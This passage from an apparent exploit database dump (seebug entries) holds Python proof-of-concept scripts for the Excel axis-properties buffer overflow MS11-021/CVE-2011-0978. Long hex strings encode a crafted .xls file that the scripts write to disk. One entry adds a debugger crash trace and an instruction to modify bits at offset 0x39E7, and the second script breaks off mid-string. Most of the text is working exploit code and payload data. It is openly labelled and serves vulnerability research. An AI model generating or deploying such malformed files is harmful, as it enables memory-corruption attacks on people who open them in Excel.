500"\r\nwD+="00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808"\r\nwD+="d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000"\r\nwD+="08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009"\r\nwD+="700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000"\r\nwD+="0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0"\r\nwD+="0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561"\r\nwD+="737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006"\r\nwD+="00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a"\r\nwD+="000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0"\r\nwD+="00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d"\r\nwD+="00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000"\r\nwD+="0000000ec00080000000df000000000b601120012020000000000000000e500100000000000"\r\nwD+="3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2"\r\nwD+="06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265"\r\nwD+="727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617"\r\nwD+="2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061"\r\nwD+="6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627"\r\nwD+="920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074"\r\nwD+="6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06"\r\nwD+="600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200"\r\nwD+="0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020"\r\nwD+="0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020"\r\nwD+="8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000"\r\nwD+="0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062"\r\nwD+="6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2"\r\nwD+="066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053"\r\nwD+="6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207"\r\nwD+="46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603"\r\nwD+="1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000"\r\nwD+="073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000"\r\nwD+="08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008"\r\nwD+="800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000"\r\nwD+="0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0"\r\nwD+="05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468"\r\nwD+="6520656173696573742077617920746f20617272616e67652074686520646174612066726f6"\r\nwD+="d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000"\r\nwD+="0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000"\r\nwD+="000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600"\r\nwD+="0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000"\r\nwD+="0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002"\r\nwD+="00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000"\r\nwD+="100800008000000000000000000250204000000ff0081000200c10414000000150000008300"\r\nwD+="02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03"\r\nwD+="f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210"\r\nwD+="00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000"\r\nwD+="8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001"\r\nwD+="0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000"\r\nwD+="000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000"\r\nwD+="00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000"\r\nwD+="f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00"\r\nwD+="030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000"\r\nwD+="0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f"\r\nwD+="0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000"\r\nwD+="70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000"\r\nwD+="fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0"\r\nwD+="060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c"\r\nwD+="0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d"\r\nwD+="7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000"\r\nwD+="0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000"\r\nwD+="0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000"\r\nwD+="e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca"\r\nwD+="9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000"\r\nwD+="0000000000250204000000ff0081000200c1041400000015000000830002000000840002000"\r\nwD+="000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f"\r\nwD+="207455000200080000020e00050000000700000002000900000008021000050002000900ff0"\r\nwD+="00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f"\r\nwD+="003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000"\r\nwD+="50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000"\r\nwD+="fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220"\r\nwD+="042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006"\r\nwD+="0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000"\r\nwD+="000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817"\r\nwD+="00670800000000000000000000020001ffffffff004400000a0000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000000000000000000000000000000feff000005010200000000000000000000000000000"\r\nwD+="0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000"\r\nwD+="00400000000400000048000000080000006000000012000000700000000c000000880000000"\r\nwD+="d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520"\r\nwD+="547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637"\r\nwD+="26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000000000000000000000000000000000feff0000050102000000000000"\r\nwD+="00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010"\r\nwD+="0000900000001000000500000000f0000005800000017000000880000000b00000090000000"\r\nwD+="100000009800000013000000a000000016000000a80000000d000000b00000000c000000050"\r\nwD+="1000002000000e40400001e0000002800000054686520477265617465722047686574746f20"\r\nwD+="466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000"\r\nwD+="b000000000000000b000000000000000b000000000000001e1000000800000004000000616c"\r\nwD+="6c000300000063770003000000687700050000007175697a000500000074657374000500000"\r\nwD+="073746174000a000000646576696174696f6e000a000000617667206772617068000c100000"\r\nwD+="020000001e0000000b000000576f726b7368656574730003000000080000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000010000000"\r\nwD+="2000000030000000400000005000000060000000700000008000000090000000a0000000b00"\r\nwD+="00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000"\r\nwD+="015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e"\r\nwD+="0000001f0000002000000021000000220000002300000024000000250000002600000027000"\r\nwD+="00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000"\r\nwD+="3100000032000000330000003400000035000000360000003700000038000000390000003a0"\r\nwD+="000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff"\r\nwD+="ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004"\r\nwD+="d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720"\r\nwD+="079000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000"\r\nwD+="000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700"\r\nwD+="6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000012000201ffffffffffffffffff"\r\nwD+="ffffff000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00"\r\nwD+="72006d006100740069006f006e0000000000000000000000000000000000000000000000000"\r\nwD+="00000280002010100000003000000ffffffff00000000000000000000000000000000000000"\r\nwD+="0000000000000000000000000000000000430000000010000000000000050044006f0063007"\r\nwD+="5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100"\r\nwD+="740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000004b00000000"\r\nwD+="10000000000000"\r\n \r\n \r\nFILE = open('webDEViL-CVE-2011-0978.xls',"wb")\r\nbacktobin=binascii.unhexlify(wD)\r\nFILE.write(backtobin)\r\nFILE.close()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20502"}, {"lastseen": "2017-11-19T18:04:37", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-05-01T00:00:00", "published": "2011-05-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20507", "id": "SSV:20507", "title": "Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow", "type": "seebug", "sourceData": "\n """\r\nThis is a PoC for MS11-021/CVE-2011-0978\r\nMicrosoft Office Excel Axis Properties Record Parsing Buffer Overflow\r\nw3bd3vil[at]gmail[dot].com\r\ntwitter.com/w3bd3vil\r\n \r\nModify bits at file location 0x39E7\r\n \r\n0:000:x86> r\r\neax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554\r\neip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\n2f36a2d5 33d2 xor edx,edx\r\n2f36a2d7 53 push ebx\r\n2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]\r\n2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx\r\n2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]\r\n2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)\r\n2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx\r\n2f36a2ed 56 push esi\r\n2f36a2ee 57 push edi\r\n2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)\r\n2f36a2f5 395514 cmp dword ptr [ebp+14h],edx\r\n2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)\r\n2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]\r\n2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????\r\n2f36a300 3bc2 cmp eax,edx\r\n2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)\r\n2f36a304 0fb738 movzx edi,word ptr [eax]\r\n2f36a307 8d4c3f02 lea ecx,[edi+edi+2]\r\n2f36a30b 51 push ecx\r\neax here points to location in the file 0xFB4.\r\n0:000:x86> dd eax\r\n04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318\r\n04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8\r\n04dd63a0 04dd03e0 00000000 00000001 00000001\r\n04dd63b0 00000001 00000001 00000001 00000001\r\n04dd63c0 00000001 00000001 00000001 00000000\r\n04dd63d0 00000000 00000000 00000000 00000000\r\n04dd63e0 00000000 00000000 00000000 00000000\r\n04dd63f0 00000000 00000000 00000000 00000000\r\n0:000:x86> dd 0376ec80\r\n0376ec80 00630009 0061006c 00730073 006f0077\r\n0376ec90 006b0072 eaf10000 00770009 00720061\r\n0376eca0 0075006d 00200070 00350023 eaf10000\r\n0376ecb0 0283eb30 6666ce60 0283eb40 6666c960\r\n0376ecc0 0283eb4c 6666c960 0000f80c 00000000\r\n0376ecd0 00006338 00000000 00000001 00000000\r\n0376ece0 0283eb98 6666ce60 0283eba4 6666c960\r\n0376ecf0 0283ebb0 6666c960 00000000 00000000\r\n \r\nwebDEViL\r\n"""\r\nimport binascii\r\n \r\n \r\nwD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000"\r\nwD+="000000000000001000000540000000000000000100000feffffff00000000feffffff000000"\r\nwD+="0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9"\r\nwD+="c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5"\r\nwD+="420202020202020202020202020202020202020202020202020202020202020202020202020"\r\nwD+="202020202020202020202020202020202020202020202020202020202020202020202020202"\r\nwD+="0202020202020202020202020202020202020202020202020202042000200b0046101020000"\r\nwD+="00c00100003d011000010002000300040005000600090008009c0002000e001900020000001"\r\nwD+="20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800"\r\nwD+="00000000010058024000020000008d00020000002200020000000e0002000100b7010200000"\r\nwD+="0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031"\r\nwD+="001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f"\r\nwD+="f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000"\r\nwD+="0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720"\r\nwD+="0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031"\r\nwD+="001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f"\r\nwD+="f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000"\r\nwD+="00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410"\r\nwD+="07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c"\r\nwD+="0031001a00220